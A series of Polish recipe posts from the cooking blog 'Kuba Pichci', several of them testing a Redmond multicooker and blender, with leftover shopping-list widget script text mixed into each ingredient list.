Nadszedł wreszcie mój ulubiony czas, kiedy w osiedlowym sklepiku kupić mogę mnóstwo pysznych i świeżych warzyw bez drenowania przy tym portfela. Nic tylko brać i korzystać. Ja postanowiłem wczoraj przygotować zapiekankę z ziemniakami i kalarepą z dodatkiem młodej włoszczyzny, śweżego czosnku i ziół wprost z donic stojących na parapecie.przepis na zapiekankę ziemniaczaną z kalarepąskładniki:1 kg ziemniaków (użyłem młodych)2 kalarepy3 ząbki czosnku (użyłem młodego)pęczek włoszczyzny (użyłem młodej)pęczek świeżych (w ostateczności solidna łyżka lub dwie suszonych) ziół (rozmaryn, tymianek, bazylia – dowolna, ulubiona Wasza kompozycja)olejlistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 kg ziemniaków (użyłem młodych)2 kalarepy3 ząbki czosnku (użyłem młodego)pęczek włoszczyzny (użyłem młodej)pęczek świeżych (w ostateczności solidna łyżka lub dwie suszonych) ziół (rozmaryn, tymianek, bazylia - dowolna, ulubiona Wasza kompozycja)olej'; document.write(" "); przygotowanie:Jeśli używamy młodych ziemniaków, szorujemy je dokładnie szczotką. Jeśli starych, obieramy i płuczemy. Kroimy je w talarki grubości ok. 5-10 mm i wkładamy do miski.Dodajemy posiekane zioła, czosnek i nieco oleju i sól. Mieszamy i połowę ziemniaków wykładamy na dno naczynia żaroodpornego.Włoszczyznę dokładnie płuczemy. Jeśli używamy młodej nie trzeba jej obierać, jeśli starej to oczywiście zróbmy to. Siekamy ją (razem z częścią liści) z grubsza, wykładamy na ziemniaki i lekko solimy.Kalarepę obieramy i kroimy w talarki. Układamy na włoszczyznę i lekko solimy.Na kalarepę wykładamy resztę ziemniaków.Zapiekamy ok 30-45  minut w 180 st. C, aż ziemniaki będą miękkie.Smacznego!Post Zapiekanka ziemniaczana z kalarepą pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Syrop z sosny

Maj to doskonała pora na zbiór świeżych pędów sosny, z których pozyskać możemy bardzo zdrowy syrop. Stanowi on naturalny środek na przeziębienie i kaszel, które dopadają nas w czasie jesiennych chłodów. Co ważne, uzyskany syrop stanowi bazę dla nalewki sosnówki.przepis na syrop z sosnyskładniki:1 kg młodych pędów sosny1 kg cukrulistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 kg młodych pędów sosny1 kg cukru'; document.write(" "); przygotowanie:Najlepiej zbierać pędy w pierwszej połowie maja, jednak do końca miesiąca bez problemu uda Wam się znaleźć pędy, które nadadzą się na syrop. Szukać trzeba średniej długości pędów bez wykształconych jeszcze igieł. Ścinamy je nożem lub sekatorem, a następnie krótko płuczemy w zimnej wodzie pozbywając się ewentualnych robaczków.Wkładamy je do słoika (można je łamać na kawałki) przesypując każdą warstwę cukrem.Słoik przykrywamy i odstawiamy na słoneczny parapet na 4 tygodnie. Od czasu do czasu potrząsamy słoikiem.Po miesiącu zlewamy syrop do wyparzonych butelek. Można wówczas przygotować nalewkę, ale o tym napiszę więcej w odpowiednim czasie.Smacznego!Post Syrop z sosny pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Sałatka ze świeżym szpinakiem

Minęły już czasy, gdy szpinak kojarzyć się może tylko i wyłącznie z rozgotowaną papką , którą straszono dzieci. Dziś bez problemu można kupić świeży szpinak, który stanowi doskonały składnik wielu dań. Szczególnie polecam tzw. szpinak baby, o małych liściach – idealny na sałatki.przepis na sałatkę ze szpinakiemskładniki:50 g sera niebieskiego sera pleśniowego200 g szpinaku sałatkowego (baby)1 jabłko1 mała czerwona cebulagarść migdałów pociętych w słupkiolej lniany (ewentualnie inny olej sałatkowy)listonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='50 g sera niebieskiego sera pleśniowego200 g szpinaku sałatkowego (baby)1 jabłko1 mała czerwona cebulagarść migdałów pociętych w słupkiolej lniany (ewentualnie inny olej sałatkowy)'; document.write(" "); przygotowanie:Szpinak dokładnie płuczemy i osuszamy. W tym celu najlepiej wykorzystać wirówkę do sałaty.Dodajemy starte na grubych oczkach jabłko oraz posiekaną cebulę.Skrapiamy nieco olejem i lekko mieszamy.Migdały prażymy krótko na rozgrzanej patelni, aż się zezłocą.Szpinak posypujemy serem porwanym na kawałki oraz migdałami.Smacznego!Post Sałatka ze świeżym szpinakiem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Grzanki serowe

Proste serowe grzanki to doskonały pomysł na szybką kolację. Kto nie lubi lekko chrupiącej skórki skrywającej w środku ciągnący się, gorący ser?przepis na grzanki seroweskładniki:150 g sera żółtego2 ciabatty4 łyżki jogurtu naturalnego2 łyżki musztardy Dijonłyżeczka sproszkowanej ostrej paprykilistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='150 g sera żółtego2 ciabatty4 łyżki jogurtu naturalnego2 łyżki musztardy Dijonłyżeczka sproszkowanej ostrej papryki'; document.write(" "); przygotowanie:Ciabatty kroimy na grube kromki i wkładamy do piekarnika nagrzanego do 180 st. C na kilka minut.Ser ścieramy na grubych oczkach, mieszamy z musztardą, jogurtem i papryką. Doprawiamy do smaku.Masę serową wykładamy na podgrzane kromki i wkładamy do piekarnika ustawionego, jeśli to możliwe, na funkcję grillowania (jeśli nie, to trudno – nic się nie stanie).Zapiekamy, aż przyrumienią się z wierzchu.Smacznego!Post Grzanki serowe pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Pizza margherita z multicookera

Kiedy opowiadałem znajomym o multicookerze Redmond RMC-M90, największe zainteresowanie budziła możliwość wypieku pizzy. Nie wiem skąd to zainteresowanie, ale to właśnie danie postanowiłem przygotować na końcu testowania urządzenia.Pomimo iż urządzenie ma załadowany automatyczny program do jej wypieku, to jednak nigdzie nie znalazłem szczegółowej informacji, na czym ten program polega, co więcej w załączonej książeczce z przepisami nie znalazłem przepisu na takie danie. Poszukałem więc w sieci, gdyż na stronie Redmond jest całkiem duża baza przepisów. Znalazłem tam przepisy na pizzę, jednak wszystkie uwzględniały program BAKE, a nie PIZZA. Jak widać, nawet sami specjaliści producenta nie mieli dostatecznego zaufania do tajemniczego programu PIZZA.Zabrakło także samego przepisu na ciasto, a jedynie ograniczono się do lakonicznego hasła w stylu „ciasto na pizzę” i listy składników do ułożenia na placku. Cóż – pozostało mi wziąć sprawy w swoje ręce i posłużyć się własnym przepisem.przepis na pizzę margherita z multicookeraskładniki:150 g mąki6 g suszonych drożdżyszczypta solioreganoketchup150 g żółtego seralistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='150 g mąki6 g suszonych drożdżyszczypta solioreganoketchup150 g żółtego sera'; document.write(" "); przygotowanie:Zaczynamy od zagniecenia ciasta. Mąkę mieszamy z drożdżami, solą, szczyptą oregano i połową wody. Wyrabiamy ręcznie ciasto podlewając resztą wody w miarę konieczności.Gdy uzyskamy już gładkie i elastyczne ciasto, formujemy kulę i wkładamy do misy multicookera. Ustawiamy program MULTICOOK, temperatura 35 st. C, czas 30 minut.Po zakończeniu programu, z wyrośniętego ciasta formujemy placek, którym wykładamy dno misy.Na wierzchu rozsmarowujemy ketchup, który posypujemy startym serem i posypujemy szczyptą oregano.Ustawiamy program BAKE i czas 35 minut. Pieczemy do zakończenia programu.Smacznego!Post Pizza margherita z multicookera pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Koktajl ze szpinakiem, bananem i ananasem

Przy okazji testowania multicookera firmy Redmond, sprawdzam także możliwości innego sprzętu tejże firmy, a mianowicie blendera RHB-2915-E. Postanowiłem sprawdzić jak poradzi sobie z przygotowaniem mojego codziennego śniadania, czyli koktajlu owocowo-warzywnego. Zadanie niezbyt skomplikowane, postanowiłem więc je nieco utrudnić dodając zamarznięty, lekko tylko rozmrożony szpinak i takie same kawałki banana. Muszę przyznać, że blender zdał egzamin i po krótkiej chwili, miałem gładki i smaczny koktajl.przepis na koktajl ze szpinakiem, bananem i ananasemskładniki:100 g mrożonego szpinaku1 banan5 krążków ananasawodalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='100 g mrożonego szpinaku1 banan5 krążków ananasawoda'; document.write(" "); przygotowanie:Używałem mrożonego banana (pokrojonego przez mrożeniem w kawałki) i takiego samego szpinaku, więc wyjąłem je z zamrażalnika jakieś 20 minut wcześniej. Można włożyć je na chwilkę do mikrofali.Szpinak, banana i ananasa wkładamy do miski. Dołączony do urządzenia kielich był dla mnie za mały.Dodajemy ok 50-100 ml wody i miksujemy do uzyskania pożądanej konsystencji.W razie potrzeby dodajemy więcej wody.Smacznego!Post Koktajl ze szpinakiem, bananem i ananasem pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Omlet z multicookera

Multicooker Redmond RMC-M90E przydaje się nie tylko przy przygotowywaniu dań głównych, zup czy wypieków. Sprawdziłem to robiąc ostatnio śniadanie, na które wymyśliłem sobie omlet z pieczarkami i cebulą. Zainspirowałem się przy tym po raz kolejny przepisem z dołączonej do urządzenia książeczki.Sam Kuchcik po raz kolejny zdał egzamin, jednak muszę tu dodać, że zawarte w książeczce instrukcje nie są zbyt jasne (a czytając komentarze innych użytkowników okazuje się, że nie tylko dla mnie). Nie chcę powiedzieć, że są błędne, bo być może to ja coś źle załapałem, ale z pewnością nie są do końca zrozumiałe, nawet dla osób, którym obsługa różnych sprzętów, gadżetów itd nie sprawia właściwie żadnych problemów. Wszystkie te kwestie opiszę szerzej w końcowej recenzji, w moich przepisach pozwolę sobie pisać „po swojemu” jak faktycznie to zrobiłem.przepis na omletskładniki:5 jajek1 średnia cebula3 pieczarkigarść startego żółtego seraszczypiorekmasło80 ml mlekasól i pieprzlistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='5 jajek1 średnia cebula3 pieczarkigarść startego żółtego seraszczypiorekmasło80 ml mlekasól i pieprz'; document.write(" "); przygotowanie:Zaczynamy od obrania i pokrojenia cebuli i pieczarek. Wkładamy je do misy multicookera, dodajemy łyżkę masła i ustawiamy program FRY z czasem przygotowania 10 minut.Wciskamy start i czekamy na nagrzanie się urządzenia. Przesmażamy do czasu zakończenia programu regularnie mieszając.W międzyczasie mieszamy jajka z posiekanym szczypiorkiem (ilość wg uznania), mlekiem, przyprawami i połową żółtego sera. Do wymieszania użyłem blendera, o którego przetestowanie również zostałem poproszony – Redmond RHB-2915-E. Oczywiście można wymieszać je chociażby i widelcem, jednak dzięki użyciu dołączonej do niego trzepaczce, masa jest doskonale napowietrzona, co sprawia, że omlet ładnie wyrasta podczas zapiekania.Po sygnale dźwiękowym wlewamy masę jajeczną, posypujemy wierzch resztą żółtego sera i ponownie zamykamy pokrywę.Ustawiamy program BAKE z czasem 20 minut.Po zakończeniu programu, danie jest gotowe.Smacznego!Post Omlet z multicookera pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Babka ziemniaczana z multicookera

Przeglądając książeczkę dołączoną do multicookera Redmond RMC-M90E, natrafiłem na przepis na babkę ziemniaczaną. Już parę razy się do niej przymierzałem, ale jakoś nie wyszło. A szkoda, bo to bardzo smaczne danie, doskonała alternatywa dla innych ziemniaczanych dań, a jej przygotowanie do dosłownie chwila jeśli mamy robota kuchennego z funkcją tarki. Ja szczęśliwie takiego posiadam, dzięki czemu starcie 1,5 kg ziemniaków zajęło mi może 1 minutę ;-) Również Kuchcik sprawił się w tym wypadku bardzo dobrze – babka pomimo iż to ciężka masa, wypiekła się bardzo dobrze, zachowując jednocześnie odpowiednią wilgotność.Babka okazała się być strzałem w  10 i z pewnością jeszcze nie raz powrócę do tego przepisu. Następnym razem dodam nieco ziół, które dodatkowo wzbogacą jej smak.przepis na babkę ziemniaczanąskładniki:1,5 kg ziemniaków3 jajka3 łyżki mąki pszennej2 ząbki czosnku1/2 pęczka natki pietruszki5 łyżek olejumasło do natłuszczenia formylistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1,5 kg ziemniaków3 jajka3 łyżki mąki pszennej2 ząbki czosnku1/2 pęczka natki pietruszki5 łyżek olejumasło do natłuszczenia formy'; document.write(" "); przygotowanie:Ziemniaki obieramy i ścieramy na tarce o grubych oczkach.Pietruszkę i czosnek siekamy i dodajemy do ziemniaków.Dodajemy jajka, olej i doprawiamy solą i pieprzem.Mieszamy na jednolitą masę i przekładamy do wysmarowanej masłem misy multicookera.Ustawiamy program BAKE z czasem pieczeni 2 godziny i zamykamy pokrywę.W połowie pieczenie odwracamy babkę i pieczemy dalej.Podajemy prosto z pieczenia, można też odsmażyć później kawałki.Smacznego!Post Babka ziemniaczana z multicookera pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Chleb pszenny z multicookera

Kolejnym przepisem jaki postanowiłem wypróbować w multicookerze Redmond Redmond RMC-M90E był przepis na chleb pszenny. Oczywiście urządzenie to nie wyrabia ciasta, ale umożliwia wyrośnięcie i upieczenie. Spełnia więc część funkcji, jakie mają maszynki pieczenia. Przyznaję, że to całkiem wygodne – mam często problem z odpowiednią temperaturą do garowania ciasta, szczególnie w chłodne jesienno-zimowe dni. Kuchcik zwalnia nas z martwienia się o to, gdyż zapewnia dowolnie długi czas wyrastania w zadanej mu temperaturze, chroniąc jednocześnie ciasto przed przeciągami.Jak widać na zdjęciu, bez żadnych ceregieli wyszedł mi naprawdę ładny i porządnie wyrośnięty bochenek chleba.przepis na chleb pszenny z multicookeraskładniki:650 g mąki pszennej1/2 łyżeczki cukru7 g suszonych drożdży1 łyżeczka soli4 łyżki oleju roślinnego2 szklanki wody (ok 475 ml)listonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='650 g mąki pszennej1/2 łyżeczki cukru7 g suszonych drożdży1 łyżeczka soli4 łyżki oleju roślinnego2 szklanki wody (ok 475 ml)'; document.write(" "); przygotowanie:Wszystkie składniki wyrabiamy ze sobą do czasu uzyskania gładkiego i jednolitego ciasta, które będzie odchodzić od ścianek naczynia.Przekładamy ciasto do misy multicookera, zamykamy pokrywę i nastawiamy program BREAD z czasem przygotowania 2 godziny. Wciskamy start.Godzinę przed zakończeniem pieczenia odwracamy bochenek i dopiekamy do czasu zakończenia programu.Po zakończeniu pieczenia, wyjmujemy bochenek i kładziemy na kratce by ostygł.Smacznego!Post Chleb pszenny z multicookera pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Barszcz czerwony z multicookera

Testowanie multicookera Redmond RMC-M90E zacząłem od ugotowania zupy. Po świątecznym obżarstwie miałem ochotę na coś lekkostrawnego, postanowiłem więc zapoznać się z załączoną do urządzenia książką kucharską. Znaleźć można tam 16 przepisów na różne zupy, spośród których wybrałem barszcz czerwony. Oczywiście przepis jest nieco „na łatwiznę” ponieważ nie jest to prawdziwy barszcz na zakwasie buraczanym, jednak z doświadczenia wiem, że i taki może być bardzo smaczny.Postępowałem dokładnie zgodnie z instrukcją, także jeśli chodzi o rodzaj składników i proporcje i muszę przyznać, że zupa wyszła bardzo smaczna. Przygotowanie jej zajęło mi 1:15 minut, ale samej pracy było tylko kwadrans, który poświęciłem na obieranie i krojenie warzyw. Reszta to sam proces gotowania, który odbywa się w zasadzie zupełnie bezobsługowo. Po nastawieniu programu zostawiamy Kuchcika na godzinę w spokoju, jedynie kilka minut przed końcem dodajemy cukier i ocet.przepis na barszcz czerwony z multicookeraskładniki:1 kg buraków2 jabłka1 marchewka1 korzeń pietruszki5 ząbków czosnku5 łyżek cukru1,5 łyżki majeranku5 liści laurowych3 ziarna ziela angielskiego½ łyżeczki czarnego pieprzu1 łyżka soli1 łyżka octu1,2 l wodylistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='1 kg buraków2 jabłka1 marchewka1 korzeń pietruszki5 ząbków czosnku5 łyżek cukru1,5 łyżki majeranku5 liści laurowych3 ziarna ziela angielskiego½ łyżeczki czarnego pieprzu1 łyżka soli1 łyżka octu1,2 l wody'; document.write(" "); przygotowanie:Warzywa obieramy i kroimy w paski 3 x 0,5 cm. Czosnek siekamy nożem.Warzywa wkładamy do misy, zalewamy wodą i doprawiamy (oprócz cukru i octu).Zamykamy pokrywę i ustawiamy program SOUP z czasem gotowania 1 godzina.Po 50 minutach dodajemy cukier i ocet i mieszamy.Zamykamy pokrywę i gotujemy jeszcze 10 minut.Smacznego!Post Barszcz czerwony z multicookera pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Tarteletki krówkowo-czekoladowe

Nie jest tak, że zawsze wszystko sam przygotowuję i nigdy nie sięgam po gotowce. Od czasu do czasu zdarza mi się iść na łatwiznę i kupić jakiś składnik, którego przygotowanie domowym sposobem zajęłoby mi za dużo czasu. Tak było niedawno z poniższymi tartaletkami, do przygotowania których wykorzystałem sklepową masę krówkowo-czekoladową z puszki. Grzech? Może i tak, ale zaoszczędziłem sporo czasu, który był mi wówczas bardzo potrzebny.Chodzi mi o to, że czasem fiksujemy się na tym, że wszystko musi być domowe, ręcznie robione, jak najmniej przetworzone itd. I jest to oczywiście dobry trend, który popieram i propaguję, jednak czasemo można sobie pomóc i ułatwić. Znam osoby, którym nigdy nie chciało się ugotować puszki z mlekiem skondensowanym (co jest dość czasochłonne), ale też miały taki opór przed sklepową krówką, że po prostu nie robiły nigdy deserów z jej wykorzystaniem. Nie dajmy się zwariować – raz nie zawsze ;-)Takie tarteletki to fajna alternatywa dla wielkanocnych mazurków. Wszak święta już tuż tuż i czas pomyśleć o tym co postawimy na stole.przepis na tarteletki krówkowo-czekoladoweskładniki:kruche ciasto (przepis znajdziecie TUTAJ)masa krówkowo-czekoladowadżem lub powidła (smak według uznania, ja użyłem powideł śliwkowych i było pysznie)bakalielistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='kruche ciasto (przepis znajdziecie TUTAJ)masa krówkowo-czekoladowadżem lub powidła (smak według uznania, ja użyłem powideł śliwkowych i było pysznie)bakalie'; document.write(" "); przygotowanie: Przygotowujemy ciasto zgodnie z przepisem, jaki podałem TUTAJ.Po schłodzeniu wykładamy nim foremki. Przykrywamy papierem do pieczenia i przyciskamy fasolą lub grochem (w wersji delux można użyć specjalnych, stworzonych do tego celu kulek ceramicznych).Pieczemy około 15 minut w 230 st. C, a następnie zdejmujemy kulki i papier i dopiekamy jeszcze 5 minut.Upieczone tarteletki pozostawiamy do wystygnięcia.Gdy ciasto osiągnie już temperaturę pokojową, na dnie rozprowadzamy warstwę dżemu lub powideł.Następnie nakładamy masę krówkową.Wierzch tarteletek zdobimy bakaliami.Odstawiamy w chłodne, ale niezbyt zimne miejsce, aby masa stężała.Smacznego!Post Tarteletki krówkowo-czekoladowe pojawił się poraz pierwszy w Kuba Pichci.

Kuba Pichci

Wrapy z jarmużem

Ku mojej uciesze, coraz częściej na sklepowych półkach znaleźć można jarmuż. To odmiana kapusty, która z niezrozumiałych dla mnie powodów przez długi czas była bardzo trudna do kupienia. Zdarzało się znaleźć jarmuż na Górniaku (takie łódzkie targowisko), ale w osiedlowym warzywniaku nigdy. A szkoda, bo jest to roślina dostarczająca wielu cennych składników takich jak wapń, żelazo, witaminy A i C oraz kwas foliowy. Polecany jest każdemu, szczególnie osobom na diecie roślinnej.Najlepiej jeść go w formie jak najmniej przetworzonej, czyli na surowo. Zachowuje wówczas swą moc. Ale doskonale smakuje nie tylko jako składnik sałatki, surówki czy koktajlu, ale także w innych daniach. Ja z 200 g przygotowałem ostatnio farsz do wrapów i została mi jeszcze garść na poranny koktajl.przepis na wrapy z jarmużemskładniki:4 tortille150 – 200 g jarmużu3 ząbki czosnkugarść startego żółtego sera4 łyżki śmietanyoliwalistonic_type='fooddrink';listonic_theme='addToShoppingList8';listonic_content='4 tortille150 - 200 g jarmużu3 ząbki czosnkugarść startego żółtego sera4 łyżki śmietanyoliwa'; document.write(" "); przygotowanie:Rozgrzewamy oliwę i przesmażamy w niej krótko posiekane ząbki czosnku.Dodajemy jarmuż i dusimy go do czasu aż zmięknie.Dodajemy ser i śmietanę.Tortille podgrzewamy, nakładamy farsz i zwijamy.Smacznego!Post Wrapy z jarmużem pojawił się poraz pierwszy w Kuba Pichci.